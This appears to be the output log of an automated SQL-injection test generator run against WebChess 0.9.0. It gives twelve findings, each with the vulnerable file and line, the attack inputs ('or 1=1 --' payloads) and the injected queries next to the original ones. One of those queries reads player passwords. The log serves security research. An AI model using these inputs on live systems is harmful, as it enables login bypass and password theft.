------

/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:63 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
Input:
ToDo="NewUser"
_fixOldPHPVersions="1"
txtNick="junk' or 1=1 -- "

NEW: SELECT playerID FROM players WHERE nick = 'junk' or 1=1 -- '
ORIGINAL: SELECT playerID FROM players WHERE nick = '1'

-----------------------

/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:107 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
Input:
ToDo="NewUser"
_fixOldPHPVersions="1"
txtNick="junk' or 1=1 -- "

NEW: SELECT * FROM players WHERE nick = 'junk' or 1=1 -- ' AND password = ''
ORIGINAL: SELECT * FROM players WHERE nick = '1' AND password = ''

-----------------------

/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:37 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/chess.php
Input:
ToDo="Login"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=1
gameID="5 or 1=1 -- "
pwdPassword="VerboseP"
txtNick="VerboseP"

NEW: SELECT nick FROM players, games WHERE playerID = whitePlayer AND gameID = 5 or 1=1 --
ORIGINAL: SELECT nick FROM players, games WHERE playerID = whitePlayer AND gameID = 1

-----------------------

/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:41 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/chess.php
Input:
ToDo="Login"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=1
gameID="5 or 1=1 -- "
pwdPassword="VerboseP"
txtNick="VerboseP"

NEW: SELECT nick FROM players, games WHERE playerID = blackPlayer AND gameID = 5 or 1=1 --
ORIGINAL: SELECT nick FROM players, games WHERE playerID = blackPlayer AND gameID = 1

-----------------------

/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:19 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/chessdb.php
Input:
ToDo="Login"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=1
gameID="5 or 1=1 -- "
pwdPassword="VerboseP"
txtNick="VerboseP"

NEW: SELECT * FROM history WHERE gameID = 5 or 1=1 --  ORDER BY timeOfMove
ORIGINAL: SELECT * FROM history WHERE gameID = 1 ORDER BY timeOfMove

-----------------------

/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:232 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/chessdb.php
Input:
ToDo="Login"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=1
gameID="5 or 1=1 -- "
pwdPassword="VerboseP"
txtNick="VerboseP"

NEW: SELECT * FROM pieces WHERE gameID = 5 or 1=1 --
ORIGINAL: SELECT * FROM pieces WHERE gameID = 1

-----------------------

/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:242 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/chessdb.php
Input:
ToDo="Login"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=1
gameID="5 or 1=1 -- "
pwdPassword="VerboseP"
txtNick="VerboseP"

NEW: SELECT whitePlayer, blackPlayer FROM games WHERE gameID = 5 or 1=1 --
ORIGINAL: SELECT whitePlayer, blackPlayer FROM games WHERE gameID = 1

-----------------------

/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:444 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/chessdb.php
Input:
ToDo="Login"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=1
gameID="5 or 1=1 -- "
pwdPassword="VerboseP"
txtNick="VerboseP"

NEW: SELECT * FROM messages WHERE gameID = 5 or 1=1 --  AND destination = 'black'
ORIGINAL: SELECT * FROM messages WHERE gameID = 1 AND destination = 'black'

-----------------------


/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:493 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/chessdb.php
Input:
ToDo="Login"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=1
gameID="5 or 1=1 -- "
pwdPassword="VerboseP"
txtNick="VerboseP"

NEW: SELECT * FROM messages WHERE gameID = 5 or 1=1 --  AND msgStatus = 'request' AND destination = 'white'
ORIGINAL: SELECT * FROM messages WHERE gameID = 1 AND msgStatus = 'request' AND destination = 'white'

-----------------------

/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:514 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/chessdb.php
Input:
ToDo="Login"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=1
gameID="5 or 1=1 -- "
pwdPassword="VerboseP"
txtNick="VerboseP"

NEW: SELECT gameMessage, messageFrom FROM games WHERE gameID = 5 or 1=1 --
ORIGINAL: SELECT gameMessage, messageFrom FROM games WHERE gameID = 1

-----------------------

/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:49 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/opponentspassword.php
Input:
ToDo="Login"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=2
gameID="5 or 1=1 -- "
pwdPassword="VerboseP"
txtNick="VerboseP"

NEW: SELECT whitePlayer, blackPlayer FROM games WHERE gameID = 5 or 1=1 --
ORIGINAL: SELECT whitePlayer, blackPlayer FROM games WHERE gameID = 1

-----------------------

/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:26 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/opponentspassword.php
Input:
ToDo="Login"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=2
opponentsID="5 or 1=1 -- "
pwdPassword="VerboseP"
txtNick="VerboseP"

NEW: SELECT password FROM players WHERE playerID = 5 or 1=1 --
ORIGINAL: SELECT password FROM players WHERE playerID = 1

-----------------------

attack count:12
coveredSQL:42
coveredTaintedSQL:40